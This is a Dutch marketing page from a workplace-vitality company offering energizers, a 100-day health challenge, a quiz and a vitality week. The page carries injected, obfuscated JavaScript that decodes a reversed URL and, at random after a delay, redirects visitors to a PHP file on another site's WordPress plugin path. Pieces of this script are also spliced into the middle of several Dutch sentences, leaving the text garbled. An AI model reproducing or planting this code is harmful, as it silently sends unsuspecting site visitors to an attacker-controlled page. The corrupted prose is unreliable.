Energizers

Energizers

Enerjoy Energizers zijn ideaal als aftrap voor vitaliteitsthema’s. Ze zorgen het losmaken van energie en voor het richten van de aandacht. Maar bovenal is het doel dat het vooral leuk is om mee te doen. Een moment van plezier waar vitaliteit centraal staat.

$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}ton”>
Neem nu contact op

100-dagen challenge

In 100 dagen gaan we samen jouw gezondheid verbeteren met kleine simpele stapjes of challenges. Geen ingewikkelde voedingsschema’s of moeilijke oefeningen maar een uitdagend programma voor iedereen. Alle uitdagingen hebben betrekking op de thema’s binnen vitaliteit: Voeding, beweging, ontspanning en slaap.

Iedere week zullen we nieuwe challenges delen. Deze variëren van makkelijk, gemiddeld toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot gevorderd. We beginnen de eerste weken met makkelijk en gemiddeld, en naar gelang de weken vorderen neemt het niveau van de challenges ook toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toe. Kies er een uit waarvan je denkt dat deze uitdagend is voor jou, maar wel te doen. Je mag ze natuurlijk ook allemaal doen.

Daarnaast delen we elke week gezonde voorbeeldmenu’s en life hacks. Je zult merken na 100 dagen ben je fitter en vitaler.

Gaan jullie de uitdaging aan?

Neem contact op voor meer informatie.

Vitaliteitsquiz

Een ideale start van een vitaliteitsdag of week. Onze vitaliteitsexpert speelt de quiz met de deelnemers en brengt hen lettelijk in beweging. Leerzaam, laagdrempelig en vooral erg leuk om mee te doen.

Neem contact op voor meer informatie.

Vitaliteitsweek

Samen met jullie kunnen wij de volledige verzorging en uitvoering van jullie vitaliteitsweek organiseren.

Neem contact op voor meer informatie.